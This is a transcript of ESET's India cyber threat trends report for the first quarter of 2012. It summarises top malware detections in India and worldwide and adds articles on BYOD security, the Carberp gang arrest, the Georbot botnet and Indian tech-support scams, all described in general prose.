eset india cyber threat trends report q1
Post on 20-Oct-2014
1.510 Views
Preview:
DESCRIPTION
TRANSCRIPT
ESET Cyber Threat Trend Report. India & Globe
Quarter I, 2012
Table of Contents
THE TOP TEN THREATS IN INDIA, QUARTER I, 2012 2
TOP THREATS (INDIA) IN BRIEF 3
THE TOP TEN THREATS (GLOBAL) 5
TOP THREATS (GLOBAL) IN BRIEF: 6
SIZING UP THE BYOD SECURITY CHALLENGE 8
WIN32/CARBERP GANG ON THE CARPET 10
CARBERP: THE RUSSIAN TROJAN BANKER NOW AIMS FACEBOOK USERS 11
FROM GEORGIA WITH LOVE: WIN32/GEORBOT INFORMATION STEALING TROJAN AND BOTNET 12
FAKE SUPPORT, AND NOW FAKE PRODUCT SUPPORT 13
SUPPORT SCAMMERS (MIS)USING INF AND PREFETCH 15
RECENT ESET PUBLICATIONS IN INDIA 17
ABOUT ESET 18
ADDITIONAL RESOURCES 18
The Top Ten Threats in India, Quarter I, 2012
TOP Threats (India) in brief:
1. INF/Autorun.gen.
A detection for 'autorun.inf' files that may be used by worms when
spreading to local, network, or removable drives.
When copying themselves to a drive, these worms also create a file
named 'autorun.inf' in the root of the targeted drive. The
'autorun.inf' file contains execution instructions for the operating
system which are invoked when the drive is viewed using Windows
Explorer, thus executing the copy of the worm.
2. HTML/ScrInject.B.Gen
Generic detection of HTML web pages containing script obfuscated or
iframe tags that that automatically redirect to the malware
download.
3. Win32/Sality
Sality is a polymorphic file infector. When run starts a service and
create/delete registry keys related with security activities in the
system and to ensure the start of malicious process each reboot of
operating system.
It modifies EXE and SCR files and disables services and process
related to security solutions.
More information relating to a specific signature:
http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality
_am_sality_ah
4. Win32/Ramnit.A.
Win32/Ramnit.A is a file infector. Files are infected by adding a new
section that contains the virus. The virus acquires data and
commands from a remote computer or the Internet. It can execute
the following operations: capture screenshots, send gathered
information, download files from a remote computer and/or the
Internet, run executable files, shut down/restart the computer.
5. LNK/Autostart.A
Exploit:Win32/CplLnk.A is a generic detection for specially-crafted,
malicious shortcut files that exploit the vulnerability that is currently
exploited by the Win32/Stuxnet family. When a user browses a folder
that contains the malicious shortcut using an application that displays
shortcut icons, the malware runs instead.
6. INF/Autorun
This detection label is used to describe a variety of malware using the
file autorun.inf as a way of compromising a PC. This file contains
information on programs meant to run automatically when
removable media
(often USB flash drives and similar devices) are accessed by a
Windows PC user. ESET security software heuristically identifies
malware that installs or modifies autorun.inf files as INF/Autorun
unless it is identified as a member of a specific malware family.
7. HTML/Iframe.B
Virus . HTML/Iframe.B is generic detection of malicious IFRAME tags
embedded in HTML pages, which redirect the browser to a specific
URL location with malicious software.
8. Win32/Autoit
Win32/Autoit is a worm that spreads via removable media, and some
of it variants spread also thru MSN. It may arrive on a system as a
downloaded file from a malicious Web site. It may also be dropped
by another malware. After infecting a system, it searches for all the
executable files and replace them with a copy of itself. It copies to
local disks and network resources. Once executed it downloads
additional threats or variants of itself.
9. Win32/Toolbar.Babylon
This class of threats ESET classifies as OUA (Potentially unwanted
application). A potentially unwanted application is a program that
contains adware, installs toolbars or has other unclear objectives. There
are some situations where a user may feel that the benefits of a
potentially unwanted application outweigh the risks. For this reason,
ESET assigns them a lower-risk category compared to other types of
malicious software, such as trojan horses or worms. While installing
your ESET security software, you can decide whether to enable
detection of potentially unwanted applications.
10. Win32/Virut.NBP
Win32/Virut.NBP is a polymorphic file infector. The virus connects to
the IRC network. It can be controlled remotely. The virus searches for
executables with one of the following extensions: .exe, .scr.
Executables are infected by appending the code of the virus to the
last section. The host file is modified in a way that causes the virus to
be executed prior to running the original code.
2. The Top Ten Threats (Global) (March 2012)
TOP Threats (Global) in brief:
1. HTML/ScrInject.B (see above)
2. INF/Autorun (see above)
3. HTML/Iframe.B
HTML/Iframe.B is generic detection of malicious IFRAME tags
embedded in HTML pages, which redirect the browser to a specific URL
location with malicious software.
4. Win32/Conficker
The Win32/Conficker threat is a network worm originally propagated
by exploiting a recent vulnerability in the Windows operating system.
This vulnerability is present in the RPC sub-system and can be remotely
exploited by an attacker without valid user credentials. Depending on
the variant, it may also spread via unsecured shared folders and by
removable media, making use of the Autorun facility enabled at
present by default in Windows (though not in Windows 7).
Win32/Conficker loads a DLL through the svchost process. This threat
contacts web servers with pre-computed domain names to download
additional malicious components. Fuller descriptions of Conficker
variants are available at
http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.
5. JS/Agent
The trojan displays dialogs that ask the user to purchase a specific
product/service. After purchasing the product/service, the malware
removes itself from the computer. Trojan is probably a part of other
malware.
6. JS/Iframe.AS
JS/Iframe.AS is a trojan that redirects the browser to a specific URL
location with malicious software. The program code of the malware is
usually embedded in HTML pages.
7. Win32/Sirefef
Win32/Sirefef.A is a trojan that redirects results of online search
engines to web sites that contain adware.
8. Win32/Sality (see above)
9. Win32/Dorkbot
Win32/Dorkbot.A is a worm that spreads via removable media. The
worm contains a backdoor. It can be controlled remotely. The file is
run-time compressed using UPX.
The worm collects login user names and passwords when the user
browses certain web sites. Then, it attempts to send gathered
information to a remote machine. This kind of worm can be controlled
remotely.
10. JS/Redirector
JS/Redirector is a trojan that redirects the browser to a specific URL
location with malicious software. The program code of the malware is
usually embedded in HTML pages.
Threats India vs Globe (January, Febryary, March 2012)
Sizing Up the BYOD Security Challenge
Stephen Cobb, ESET Security Evangelist
On the plus side of BYOD known you may get more work
from people when they can work in more places and at more times
of the day (from the breakfast table in the morning to the kitchen
table at night and the coffee shop in between). There can be cost
savings too: equipment outlays can be reduced if employees use
their own devices instead of the company buying them.
At the same time, IT security managers must weigh those
benefits against the security risks that come with these devices,
plus the cost of bringing them into line with existing security
policies and compliance standards. For example, what are the legal
ramifications of an employee’s personal laptop going missing when
it contains your customer list or sensitive internal
correspondence? To help companies get a handle on the scale and
scope of these risks, ESET engaged Harris Interactive to survey
some 1,300 adults in America who are currently employed. We
found more than 80 percent of them “use some kind of personally
owned electronic device for work-related functions.” Many of
these devices are older technologies like laptop and desktop
computers, but smartphones and tablets are already a significant
part of the BYOD phenomenon.
Unfortunately, the survey paints a worrying picture of security
on these devices; for example, encryption of company data is only
happening on about one third of them. One third of those
surveyed responded that company data is not encrypted when it is
on their personal devices and the remaining third did not know
one way or the other, which is worrying in itself. You can see more
of the findings in the accompanying infographic.
One particular area of concern is small devices—like tablets
and smartphones—that are easier to steal than laptops and
desktops but pack tremendous processing, storage, and
communication capabilities. Consider the Microsoft Word
document in which the results of ESET’s BYOD survey were
presented. This file takes up 170 kilobytes of storage space and
contains 17 pages of charts, tables, and text that summarize the
most important findings from this not inexpensive research. That
means you could easily store more than 70,000 similar reports on
16 gigabyte smart phone or microSD card. A smartphone could
transmit all 70,000 documents to the other side of the world in
matter of minutes on a WiFi or 4G/LTE connection (the latter could
prove costly, but the recipient might be happy to pay the data
overage).
So it is not good news to learn that only 25 percent of
smartphone users, and less than 10 percent of tablet users, say
they have enabled auto-locking on these devices (the feature that
locks the device after a period of inactivity and requires a
password or code to unlock). Overall, we found that less than half
of all devices in the BYOD category are protected by basic security
measures. On the bright side, BYOD security could be boosted
cheaply and quickly if companies did the following:
Mandate auto-locking with password protection on all
devices.
Enable remote lock/wipe to protect data on any
stolen devices.
Enable encryption of company data on all devices.
Make sure up-to-date anti-malware protection is
active on all devices.
In summary, now would be a good time to check how your
company is handling BYOD security. With roughly two thirds of our
survey respondents reporting that their employer had not yet
implemented a BYOD policy, or provided any security training,
those would be good places to start.
Win32/Carberp Gang on the Carpet
On March, 20 Group-IB, ESET’s partner in Russia providing
comprehensive investigation of IT security incidents and breaches of
information security, announced the results of its joint investigation
with the Federal Security Service (FSB) and the Ministry of the Interior
(MVD) of Russia resulting in the arrest of a gang of eight accused of
offences under the Russian Federation's Criminal Code including
larceny, creation and distribution of malicious software,
and unauthorized access to computer information. The fraudsters
were engaged in online banking fraud, affecting the clients of
over a hundred banking institutions worldwide within last 2
years. The group of hackers manages to steal over 130 million
rubles just within a quarter.
Group-IB have identified them as using Win32/Carberp and
Win32/RDPdoor in pursuit of criminal profit, going beyond
stealing banking credentials and plundering bank accounts to
DDoS (Distributed Denial of Service) attacks.
It's been suggested that if convicted, they can expect sentences
of up to 10 years. The investigation of the botnet and its servers,
obtained as a result of interaction with specialized organizations
in various countries, including Holland and Canada, helped
prevent theft of funds from clients of over a hundred banking
institutions worldwide.
For the first time in international practice it was possible to
establish the entire criminal chain, including the head of this
group and owner of a botnet, those conducting fraudulent
transactions, and those directly involved in cashing the stolen
funds. In all, a total of eight individuals comprised the group. It
should be noted that in addition to stealing funds from bank
accounts, the criminals were also involved in carrying out
distributed denial of service (DDoS) attacks.
The criminals hacked websites actively using accountant services
in their operations, as well as popular news media websites and
online stores, infecting them with malware. Having established
remote access to the computer of a potential victim, and having
detected online banking details on that computer, the criminals
created a fraudulent payment order to transfer funds to a
specially prepared account. Then the stolen funds were cashed
via bank cards, established for dummy individuals or legal
entities. In order to have a comfortable working environment, an
office was opened by the criminals, functioning as a data
recovery company.
“Our experts did an enormous amount of work, which resulted in
identifying the head of this criminal group, the owner and
operator of a specialized banking botnet, identifying the control
servers, and identifying the directing of traffic from popular
websites in order to spread malware infection,” noted Ilya
Sachkov, Group-IB CEO in company’s press release. “The
investigations conducted by our Forensics Lab confirmed the use
of the Win32/Carberp and Win32/Rdpdor malware by the
criminals in order to carry out theft of funds.”
ESET whitepaper on Win32/Carberp is available here:
http://go.eset.com/us/resources/white-papers/carberp.pdf .
Carberp: the Russian Trojan banker now aims Facebook users
David Harley and a Russian research colleague, Aleksandr Matrosov, explain that the most widely spread banking trojan in Russia is now trying to steal money from Facebook users.
ESET researchers noted that Win32/Carberp used bootkit
components from malware called Ronix, which was also the
subject of scrutiny in February.
The article specifies different kind of information about this
threat such as:
Fake Facebook Lockout
Demanding e-Cash
Faking Facebook
Web-Injects
Carberp Detection in Russia
Global infection statistics
Bypassing DDoS Prevention Systems
The complete description can be read from Facebook
Fakebook: New Trends in Carberp Activity.
Also, there was a related post to new trends in Carberp
Activity is Rovnix Reloaded: new step of evolution which
explains the new developments of this threat. This is detected
as Win32/Rovnix.B trojan, this appears to be the first bootkit
to employ VBR (Volume Boot Record) infection.
From Georgia With Love: Win32/Georbot information stealing trojan and botnet
by Righard Zwienenberg Senior Research Fellow
Malicious software that gets updates from a domain belonging to the
Eurasian state of Georgia? This unusual behavior caught the attention
of an analyst in ESET's virus laboratory earlier this year, leading to
further analysis which revealed an information stealing trojan being
used to target Georgian nationals in particular. After further
investigation, ESET researchers were able to gain
access to the control panel of the botnet created
with this malware, revealing the extent and the
intent of this operation.
Finding a new botnet is not unusual these days and
most are not particularly interesting from a nerdy,
techie point of view, but it turns out that this one
(dubbed Win32/Georbot) is both unusual and
interesting. Amongst other activities, it will try to
steal documents and certificates, can create audio and video
recordings and browse the local network for information. One
unusual aspect is that it will also look for “Remote Desktop
Configuration Files” that enables the people receiving these files to
connect to the remote machines without using any exploit. That
approach will even bypass the need for RDP exploits such as the one
that was revealed last week (MS12-20).
Win32/Georbot features an update mechanism to get new versions
of the bot as an attempt to remain undetected by anti-malware
scanners. The bot also has a fall-back mechanism in case it can’t reach
the C&C (Command and Control) server: in that case it will then
connect to a special webpage that was placed on a system hosted by
the Georgian government. This does not
automatically mean that the Georgian
government is involved. Quite often people are
not aware their systems are compromised. It
should be also noted that the Data Exchange
Agency of the Ministry of Justice of Georgia and
its national CERT were fully aware of the
situation as early as 2011 and, parallel to their
own – still ongoing – monitoring, have
cooperated with ESET on this matter.
Win32/Georbot uses various obfuscation techniques to make static
analysis more difficult, but for experienced malware analysts that is
not much of a problem to overcome, and Win32/Georbot was well
worth the time it took to undertake a detailed analysis. The full white
paper containing the detailed analysis available as a PDF file.
Fake Support, And Now Fake Product Support
David Harley Senior Research Fellow
There's a blog article I've been wanting to write for a few days, but
haven't so far been able to make time for. However, Martijn Grooten
drew my attention to a blog on much the same topic from our friends at
Avast! and one of ESET's partners alerted me to a very relevant and
related post by Brian Krebs, so I've pushed it to the top of the stack.
I first became aware of the plague of Indian companies operating PC
and anti-virus support scams because one of our competitors advised
me that one of them was apparently carrying out unethical marketing
on ESET's behalf. (They weren't, of course, anything to do with ESET:
see this blog series and this paper.)
I recently learned from my colleagues at ESET UK that cold-callers
from Mumbai have developed a new twist on this cold-calling scam,
calling people in the UK and apparently claiming to offer paid support in
response to problems that don't exist, because, they claim, "ESET
doesn''t offer free support." (Don't panic! For genuine ESET customer
support, there are contact details on the web page for the ESET partner
or distributor responsible for the region in which you live. In India ESET
is obviously provoding support to all customers, the contacts are the
following: www.esetindia.com, https://www.facebook.com/esetindia,
Toll Free Phone 1800-209-1999).
It appears from a recent Avast! blog that Avast! customers are suffering
a similar experience, 'receiving phone calls from “Avast customer
service” reps who need to take control of their computer to resolve
some issue and who, for a fee, wish to charge them for this privilege.'
Unfortunately, according to Brian Krebs, "users are reporting that the
incidents followed experiences with iYogi, the company in India that is
handling Avast’s customer support." (The relationship is confirmed by
an Avast! blog here.)
While someone describing himself as the co-founder and president of
marketing at iYogi has strongly denied any connection with the usual
gang of out-and-out scammers, the use, as described by Krebs, of the
Event Viewer ploy characteristic of Indian support scams means that
iYogi is going to have to work hard to prove its innocence. My guess is
that if Avast!, a company with an excellent reputation previously,
discovers that iYogi is indeed operating on the side of the non-angels,
heads – and outsourcing contracts – will roll.
Support services for anti-virus products obviously vary according to
vendor and product. Free one-to-one support may not be available for
free products, and other support may range from free but basic, to
cattle-class, to business class or de luxe. However, reputable security
companies do have standards that should apply at all points on the
spectrum:
They don't make unsolicited phone calls to tell you about viruses you
don't have. Sorry, but I can't guarantee that you won't get
marketing calls but they should be within acceptable legal and
ethical boundaries, and that doesn't include pretending to see
malware on a system they don't have access to.
They won't use nasty semi-fraudulent techniques to "prove"
you have a virus problem like telling you that Event Viewer, or
ASSOC (the CLSID trick described here), or "Prefetch virus" or
INF is listing malicious files. (Those last two tricks are
now summarized in a separate blog article here.)
If you're subscribed to some form of premium package that
attracts a subscription rate, they're not likely to try to gouge
even more cash or financial data out of you by ringing you up to
scare you to death.
They won't try to get direct access to your system free versions
of commercial remote access software so that they can upload
various free/limited functionality security packages: if a
professional AV company needs access to your machine, they
won't do it by misusing free licences for another company's
software.
Unless, of course, they partner with a support organization that doesn't
see the difference between legitimate marketing and outright
misrepresentation and fraud. If Avast! has, in fact, fallen into that trap,
they have my sincere sympathy. But it will be hard for them to recover
from that misstep, and the reputation of the rest of the AV industry has
also taken a blow. We can only hope that some good will come out of
this, like real progress on effective legal action against support scams.
Paying for third-party support for a free product may sound like a good
idea in principle, since AV companies don't don't normally offer one-to-
one support for free products. But it's generally safer to upgrade to a
paid version, especially if you already suspect that you have malware on
your system. The problem here is that sometimes people don't get AV
until they have a problem, and at that point, saving money with a free
solution may be a false economy.
Cold-calling (or spamming support forums) to offer paid support for
products that already offer free support to paying customers may not
sound particularly ethical (well, it doesn't to me). Worse, it may actually
cause damage to your system which may even, depending on the
vendor and the actual circumstances, compromise your ability to
get the legitimate support you've already paid for. But it isn't
necessarily fraudulent. (Or illegal, though it may go against privacy
legislation covering "Do Not Call" lists, for example, though if the Krebs
story is correct, the existence of a pre-existing support relationship may
be used to get round that. And unfortunately, cold-callers from India
tend to ignore local do-not-call lists: in fact, some legitimate companies
seem to be taking advantage of offshored support to bypass such lists.)
But if the call is made on the basis of reports of malware that you don't
have, or at some stage the caller tries to persuade you that utilities like
INF, PREFETCH, ASSOC and EVENTVWR are proof that you have
malware issues, the intent is clearly fraudulent.
Personally, I'd suggest that you regard any unsolicited phone call from a
company claiming to offer antivirus support, even for a product you
actually have, as a probable scam.
Support Scammers (mis)using INF and PREFETCH David Harley Senior Research Fellow
Tere's a quick summary of the PREFETCH and INF ploys I mentioned
above. These are alternatives (or supplements) used by support
scammers from India to the Event Viewer and ASSOC/CLSID ploys also
used to "prove" to a victim that their system is infected with malware or
has other security/integrity problems.
The "Prefetch" command shows the contents of C:\Windows\Prefetch,
containing files used in loading programs.
The "INF" command actually shows the contents of a folder
normally named C:\Windows\Inf: it contains files used in
installing the system.
INF and PREFETCH are legitimate system utilities: so how are
they misused by scammers? By asking a victim to press
Windows-R to get the Run dialogue box, then asking them to
type in something "prefetch hidden virus" or "inf trojan
malware". When a folder listing like those above appears, the
victim believes that the system is listing malicious files. In fact,
neither of these commands accepts parameters in the Run box.
You could type "inf elvish fantasy" or "prefetch me a gin and
tonic" and you'd get exactly the same directory listing, showing
legitimate files. Neat trick: but don't you fall for it!
Recent ESET publications in India
ESET researchers and speakers are often invited to contributefor other publications, in India and worldwide. Here’s a selection of few
articles that have appeared in Indian media this quarter.
SME Channels, Mar 28, 2012 ESET’s Caveat Against Sharing Facebook
http://smechannels.com/news/eset-s-caveat-against-sharing-facebook.aspx
EFYtimes.com Employee’s Facebook Passwords Can Be Dangerous For Your Company
http://efytimes.com/e1/80931/Employees-Facebook-Passwords-Can-Be-Dangerous-For-Your-Company
Information Week, April 12, 2012 , Humans and Heuristics: Making people part of information security solutions
http://www.informationweek.in/Security/12-04-12/Humans_and_Heuristics_Making_people_part_of_information_security_solutions.aspx
Business Standard Jan 23, 2012Cyber crime is now a booming industry
http://www.business-standard.com/india/news/cyber-crime-is-nowbooming-industry/462549/
PCQuest January 09, 2012 Future Outlook of Cyber Crime & Security
http://pcquest.ciol.com/content/topstories/futureoutlook/2012/112010908.asp
Biztech2.com 18th February, 2012 Cybercrime Predictions 2012
http://biztech2.in.com/blogs/industry-expert/cybercrime-predictions-2012/125402/0
About ESET
Founded in 1992, ESET is a global provider of security solutions for businesses and consumers. ESET’s flagship products ESET NOD32 Antivirus, ESET
Smart Security and ESET Cybersecurity for Mac are trusted by millions of global users. ESET NOD32 Antivirus holds the world record for the number
of Virus Bulletin "VB100” Awards, and has never missed a single “In-the-Wild” worm or virus since the inception of testing in 1998. The Company
has global headquarters in Bratislava (Slovakia), with regional distribution headquarters in San Diego (U.S.), Buenos Aires (Argentina), and
Singapore. ESET has malware research centers in Bratislava, San Diego, Buenos Aires, Prague (Czech Republic), Krakow (Poland), Montreal (Canada),
Moscow (Russia), and an extensive partner network in 180 countries.
In India ESET products are exclusively supplied and supported by "ESS Distribution Pvt Ltd". The sales of ESET products are executed through the
Channel Partners across India.
Additional resources
Keeping your knowledge up to date is as important as keeping your AV updated. For these and other suggested resources please visit the ESET
Threat Center to view the latest:
ESET India Facebook
ESET India Twitter
ESET White Papers
ESET Blog
ESET Podcasts
Independent Benchmark Test Results
Anti-Malware Testing and Evaluation
top related